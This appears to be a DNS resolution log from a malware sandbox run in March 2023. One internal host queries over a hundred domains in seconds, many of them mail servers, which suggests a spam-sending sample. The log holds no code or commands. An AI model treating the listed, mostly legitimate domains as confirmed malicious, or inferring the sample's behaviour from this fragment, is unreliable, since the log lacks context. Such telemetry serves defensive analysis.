                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.609584093 CET8.8.8.8192.168.2.50xf19dNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.619155884 CET8.8.8.8192.168.2.50x9de1No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.620131016 CET8.8.8.8192.168.2.50x73dfName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.620481014 CET8.8.8.8192.168.2.50x2ae5No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.650516987 CET8.8.8.8192.168.2.50x9bd3No error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.663723946 CET8.8.8.8192.168.2.50x852cName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.686738014 CET8.8.8.8192.168.2.50xe1c9No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.687006950 CET8.8.8.8192.168.2.50x46a5No error (0)gmail-smtp-in.l.google.com142.251.31.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.687784910 CET8.8.8.8192.168.2.50x1c9No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.688457012 CET8.8.8.8192.168.2.50x71d2No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.711572886 CET8.8.8.8192.168.2.50x4912No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.711572886 CET8.8.8.8192.168.2.50x4912No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.711572886 CET8.8.8.8192.168.2.50x4912No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.711572886 CET8.8.8.8192.168.2.50x4912No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.711572886 CET8.8.8.8192.168.2.50x4912No error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.754537106 CET8.8.8.8192.168.2.50xb7d0No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.758331060 CET8.8.8.8192.168.2.50xeecaName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.762612104 CET8.8.8.8192.168.2.50x5a63No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.767945051 CET8.8.8.8192.168.2.50xd072No error (0)in1.smtp.messagingengine.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.767945051 CET8.8.8.8192.168.2.50xd072No error (0)in1.smtp.messagingengine.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.767945051 CET8.8.8.8192.168.2.50xd072No error (0)in1.smtp.messagingengine.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.767945051 CET8.8.8.8192.168.2.50xd072No error (0)in1.smtp.messagingengine.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.767945051 CET8.8.8.8192.168.2.50xd072No error (0)in1.smtp.messagingengine.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.767945051 CET8.8.8.8192.168.2.50xd072No error (0)in1.smtp.messagingengine.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.844650030 CET8.8.8.8192.168.2.50x59d0Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.905761003 CET8.8.8.8192.168.2.50xec84Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.957109928 CET8.8.8.8192.168.2.50x67dbNo error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.974754095 CET8.8.8.8192.168.2.50xa1beNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.980510950 CET8.8.8.8192.168.2.50x5aa3No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.980510950 CET8.8.8.8192.168.2.50x5aa3No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.980510950 CET8.8.8.8192.168.2.50x5aa3No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.980510950 CET8.8.8.8192.168.2.50x5aa3No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.018747091 CET8.8.8.8192.168.2.50x3622No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.037055969 CET8.8.8.8192.168.2.50xb091Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.048396111 CET8.8.8.8192.168.2.50xf847Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.048959017 CET8.8.8.8192.168.2.50xbbefNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.048959017 CET8.8.8.8192.168.2.50xbbefNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.048959017 CET8.8.8.8192.168.2.50xbbefNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.048959017 CET8.8.8.8192.168.2.50xbbefNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.051067114 CET8.8.8.8192.168.2.50xc30aNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.055640936 CET8.8.8.8192.168.2.50x3d3aNo error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.055640936 CET8.8.8.8192.168.2.50x3d3aNo error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.063283920 CET8.8.8.8192.168.2.50xd5f6No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.073620081 CET8.8.8.8192.168.2.50xd74cName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.114885092 CET8.8.8.8192.168.2.50xac7aServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.124782085 CET8.8.8.8192.168.2.50x2952No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.259571075 CET8.8.8.8192.168.2.50xd49bNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.261969090 CET8.8.8.8192.168.2.50xc023No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.279270887 CET8.8.8.8192.168.2.50xda12No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.295382977 CET8.8.8.8192.168.2.50xefe5No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.343461037 CET8.8.8.8192.168.2.50x60ceNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.343461037 CET8.8.8.8192.168.2.50x60ceNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.348198891 CET8.8.8.8192.168.2.50x449fNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.365963936 CET8.8.8.8192.168.2.50x7f31No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.365963936 CET8.8.8.8192.168.2.50x7f31No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.374795914 CET8.8.8.8192.168.2.50xbc6aNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.374795914 CET8.8.8.8192.168.2.50xbc6aNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.374795914 CET8.8.8.8192.168.2.50xbc6aNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.383521080 CET8.8.8.8192.168.2.50x81d0No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.405272007 CET8.8.8.8192.168.2.50xab00No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.440282106 CET8.8.8.8192.168.2.50x77aeNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.538445950 CET8.8.8.8192.168.2.50xc8d4No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.579855919 CET8.8.8.8192.168.2.50xb201No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.579855919 CET8.8.8.8192.168.2.50xb201No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.636136055 CET8.8.8.8192.168.2.50x8f5cNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.686017036 CET8.8.8.8192.168.2.50x1460No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.694612980 CET8.8.8.8192.168.2.50xe16dNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.698311090 CET8.8.8.8192.168.2.50x77bdNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.710318089 CET8.8.8.8192.168.2.50xb8e4No error (0)rkengg.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.710318089 CET8.8.8.8192.168.2.50xb8e4No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.710318089 CET8.8.8.8192.168.2.50xb8e4No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.710318089 CET8.8.8.8192.168.2.50xb8e4No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.746376038 CET8.8.8.8192.168.2.50xa194No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.774230003 CET8.8.8.8192.168.2.50x7800No error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.774230003 CET8.8.8.8192.168.2.50x7800No error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.813103914 CET8.8.8.8192.168.2.50x965dNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.813103914 CET8.8.8.8192.168.2.50x965dNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.857681990 CET8.8.8.8192.168.2.50xabb3No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.874273062 CET8.8.8.8192.168.2.50x42afNo error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.915236950 CET8.8.8.8192.168.2.50xbd17No error (0)gmail-smtp-in.l.google.com142.251.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.915472031 CET8.8.8.8192.168.2.50x55cNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.931718111 CET8.8.8.8192.168.2.50x7713No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.931718111 CET8.8.8.8192.168.2.50x7713No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.936253071 CET8.8.8.8192.168.2.50x125eNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.936253071 CET8.8.8.8192.168.2.50x125eNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.942285061 CET8.8.8.8192.168.2.50x41c5No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.974767923 CET8.8.8.8192.168.2.50xde0fNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.012039900 CET8.8.8.8192.168.2.50xb9dfNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.012039900 CET8.8.8.8192.168.2.50xb9dfNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.012039900 CET8.8.8.8192.168.2.50xb9dfNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.052916050 CET8.8.8.8192.168.2.50x54f5No error (0)in1.smtp.messagingengine.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.052916050 CET8.8.8.8192.168.2.50x54f5No error (0)in1.smtp.messagingengine.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.052916050 CET8.8.8.8192.168.2.50x54f5No error (0)in1.smtp.messagingengine.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.052916050 CET8.8.8.8192.168.2.50x54f5No error (0)in1.smtp.messagingengine.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.052916050 CET8.8.8.8192.168.2.50x54f5No error (0)in1.smtp.messagingengine.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.052916050 CET8.8.8.8192.168.2.50x54f5No error (0)in1.smtp.messagingengine.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.061981916 CET8.8.8.8192.168.2.50x2333No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.103744030 CET8.8.8.8192.168.2.50xfd95Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.113020897 CET8.8.8.8192.168.2.50x7fcaNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.117950916 CET8.8.8.8192.168.2.50xb476No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.132788897 CET8.8.8.8192.168.2.50xbc27No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.132788897 CET8.8.8.8192.168.2.50xbc27No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.132788897 CET8.8.8.8192.168.2.50xbc27No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.132788897 CET8.8.8.8192.168.2.50xbc27No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.177141905 CET8.8.8.8192.168.2.50x61d9No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.177141905 CET8.8.8.8192.168.2.50x61d9No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.177141905 CET8.8.8.8192.168.2.50x61d9No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.177141905 CET8.8.8.8192.168.2.50x61d9No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.182523012 CET8.8.8.8192.168.2.50xe195No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.182523012 CET8.8.8.8192.168.2.50xe195No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.195628881 CET8.8.8.8192.168.2.50x486cNo error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.195628881 CET8.8.8.8192.168.2.50x486cNo error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.223493099 CET8.8.8.8192.168.2.50xcd7dNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.232903004 CET8.8.8.8192.168.2.50x83b3Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.246464014 CET8.8.8.8192.168.2.50x68bfNo error (0)rast.se89.221.250.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.290509939 CET8.8.8.8192.168.2.50xaa30Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.312951088 CET8.8.8.8192.168.2.50x9e4No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.320327997 CET8.8.8.8192.168.2.50x31e9No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.320327997 CET8.8.8.8192.168.2.50x31e9No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.346764088 CET8.8.8.8192.168.2.50xf0deNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.401587009 CET8.8.8.8192.168.2.50x2a37Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.413645983 CET8.8.8.8192.168.2.50x7ebNo error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.413645983 CET8.8.8.8192.168.2.50x7ebNo error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.413645983 CET8.8.8.8192.168.2.50x7ebNo error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.413645983 CET8.8.8.8192.168.2.50x7ebNo error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.424484015 CET8.8.8.8192.168.2.50x8ca1No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.429322004 CET8.8.8.8192.168.2.50x6076No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.450376034 CET8.8.8.8192.168.2.50xe48fNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.505062103 CET8.8.8.8192.168.2.50x9f3bNo error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.518935919 CET8.8.8.8192.168.2.50x6aa1No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.606988907 CET8.8.8.8192.168.2.50xc96aNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.645678043 CET8.8.8.8192.168.2.50xbf1bNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.645678043 CET8.8.8.8192.168.2.50xbf1bNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.670452118 CET8.8.8.8192.168.2.50x41c0No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.683799982 CET8.8.8.8192.168.2.50xc9deNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.711258888 CET8.8.8.8192.168.2.50x4e7dNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.773371935 CET8.8.8.8192.168.2.50xefd0No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.013325930 CET8.8.8.8192.168.2.50xf40No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.013325930 CET8.8.8.8192.168.2.50xf40No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.025522947 CET8.8.8.8192.168.2.50x9b28No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.070112944 CET8.8.8.8192.168.2.50xf91No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.167742014 CET8.8.8.8192.168.2.50x9bdfNo error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.178406000 CET8.8.8.8192.168.2.50x553aNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.290998936 CET8.8.8.8192.168.2.50x6938No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.290998936 CET8.8.8.8192.168.2.50x6938No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.290998936 CET8.8.8.8192.168.2.50x6938No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.421323061 CET8.8.8.8192.168.2.50xe9e4No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.460277081 CET8.8.8.8192.168.2.50x2699No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.462274075 CET8.8.8.8192.168.2.50x262No error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.462274075 CET8.8.8.8192.168.2.50x262No error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.516098976 CET8.8.8.8192.168.2.50x35f3No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.521352053 CET8.8.8.8192.168.2.50xad42No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.558343887 CET8.8.8.8192.168.2.50xe03bNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.561352015 CET8.8.8.8192.168.2.50x9d4dNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.628223896 CET8.8.8.8192.168.2.50xd611No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
